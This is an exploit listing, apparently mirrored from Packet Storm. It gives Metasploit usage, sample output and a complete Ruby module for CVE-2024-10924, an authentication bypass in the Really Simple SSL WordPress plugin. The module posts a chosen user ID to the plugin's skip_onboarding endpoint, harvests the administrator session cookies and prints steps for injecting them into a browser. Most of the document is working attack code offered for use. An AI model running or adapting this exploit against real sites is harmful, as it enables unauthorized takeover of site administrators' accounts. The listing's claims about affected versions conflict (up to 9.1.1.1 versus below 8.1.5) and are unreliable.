Share
## https://sploitus.com/exploit?id=PACKETSTORM:216375
=============================================================================================================================================
| # Title : WordPress Really Simple Security 9.1.1.1 authentication bypass vulnerability |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits) |
| # Vendor : https://wordpress.org/plugins/ |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/214234/ & CVE-2024-10924
[+] Summary : This module exploits an authentication bypass vulnerability (CVE-2024-10924) in the Really Simple SSL plugin for WordPress (versions <= 9.1.1.1).
The vulnerability exists in the skip_onboarding REST API endpoint.
When exploited, the module allows unauthenticated attackers to gain full administrator access by impersonating a valid user ID.
[+] Usage :
# 1. Vulnerability Check
msf6 > use exploit/multi/http/wordpress_really_simple_ssl_auth_bypass
msf6 exploit(...) > set RHOSTS target.com
msf6 exploit(...) > set TARGETURI /wordpress
msf6 exploit(...) > check
[+] target.com:80 - Vulnerable version 8.1.3 detected
# 2. Exploiting the Vulnerability to Obtain Cookies
msf6 exploit(...) > exploit
[*] Starting authentication bypass attempt...
[+] Authentication bypass successful!
[+] Admin access confirmed!
[+] MANUAL EXPLOITATION INSTRUCTIONS
======================================
[+] Authentication Bypass Successful!
Cookies obtained: wordpress_logged_in_abc=...
[+] Next Steps:
1. Visit: http://target.com/wordpress/wp-admin
2. Use cookies from above
3. You should have admin access
# 3. Manual Exploitation
# Using curl or your browser with cookies
[+] POC :
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'WordPress Really Simple SSL Plugin Authentication Bypass',
'Description' => %q{
This module exploits an authentication bypass vulnerability (CVE-2024-10924)
in the Really Simple SSL plugin for WordPress (versions < 8.1.5).
The vulnerability exists in the skip_onboarding REST API endpoint.
When exploited, the module allows unauthenticated attackers to gain
full administrator access by impersonating a valid user ID.
},
'Author' => [
'JoshuaProvoste', # Original Discovery
'indoushka' # Professional Refinement
],
'License' => MSF_LICENSE,
'References' => [
['CVE', '2024-10924'],
['URL', 'https://www.wordfence.com/blog/2024/11/critical-authentication-bypass-vulnerability-patched-in-really-simple-ssl-plugin/'],
['URL', 'https://really-simple-ssl.com/cve-2024-10924-authentication-bypass/']
],
'DisclosureDate' => '2024-11-06',
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Targets' => [
['WordPress Really Simple SSL < 8.1.5', {}]
],
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [RELIABLE_SIDE_EFFECTS],
'SideEffects' => [IOC_IN_LOGS]
}
))
register_options([
OptString.new('TARGETURI', [true, 'The base path to WordPress', '/']),
OptInt.new('USER_ID', [true, 'User ID to impersonate (Administrator is usually 1)', 1])
])
end
def check
vprint_status("Checking Really Simple SSL version...")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'wp-content/plugins/really-simple-ssl/readme.txt')
})
return CheckCode::Unknown('Target unreachable') unless res
if res.code == 200 && res.body.include?('Really Simple SSL')
version = res.body.scan(/Stable tag:\s*([\d.]+)/).flatten.first
if version
vprint_status("Found version: #{version}")
if Rex::Version.new(version) < Rex::Version.new('8.1.5')
return CheckCode::Appears("Vulnerable version #{version} detected")
end
return CheckCode::Safe("Version #{version} is not vulnerable")
end
end
CheckCode::Safe
end
def exploit
api_path = normalize_uri(target_uri.path, 'wp-json', 'reallysimplessl', 'v1', 'two_fa', 'skip_onboarding')
print_status("Attempting authentication bypass on #{datastore['RHOST']}...")
res = send_request_cgi({
'method' => 'POST',
'uri' => api_path,
'headers' => { 'Content-Type' => 'application/json' },
'data' => {
'user_id' => datastore['USER_ID'],
'login_nonce' => Rex::Text.rand_text_alphanumeric(14),
'redirect_to' => '/wp-admin/'
}.to_json
})
unless res && res.get_cookies =~ /wordpress_(logged_in|sec)_/
fail_with(Failure::NoAccess, "Bypass failed. No valid session cookies found in response.")
end
@cookies = res.get_cookies
print_good("Successfully obtained authentication cookies.")
print_status("Verifying administrative access...")
if verify_admin_access
print_good("Admin access confirmed via dashboard check!")
loot_path = store_loot(
'wp.cookies',
'text/plain',
datastore['RHOST'],
@cookies,
'wordpress_session_cookies',
"CVE-2024-10924 Auth Bypass - User ID: #{datastore['USER_ID']}"
)
print_status("Session cookies stored at: #{loot_path}")
report_instructions
return
else
print_warning("Cookies obtained but admin verification failed. User ID might not have admin rights.")
print_line("Cookies: #{@cookies}")
end
end
def verify_admin_access
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'wp-admin', 'plugin-install.php'),
'cookie' => @cookies
})
res && res.code == 200 && res.body.include?('plugin-install.php') && !res.body.include?('wp-login.php')
end
def report_instructions
admin_url = full_uri(normalize_uri(target_uri.path, 'wp-admin/'))
print_line("\n" + "="*70)
print_line(" EXPLOITATION COMPLETED SUCCESSFULLY")
print_line("="*70)
print_line("Admin URL: #{admin_url}")
print_line("Cookies: #{@cookies}")
print_line("\nInstructions:")
print_line("1. Open your browser and navigate to the Admin URL.")
print_line("2. Use a cookie editor extension to inject the cookies above.")
print_line("3. Refresh the page to access the WordPress dashboard.")
print_line("="*70 + "\n")
end
end
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================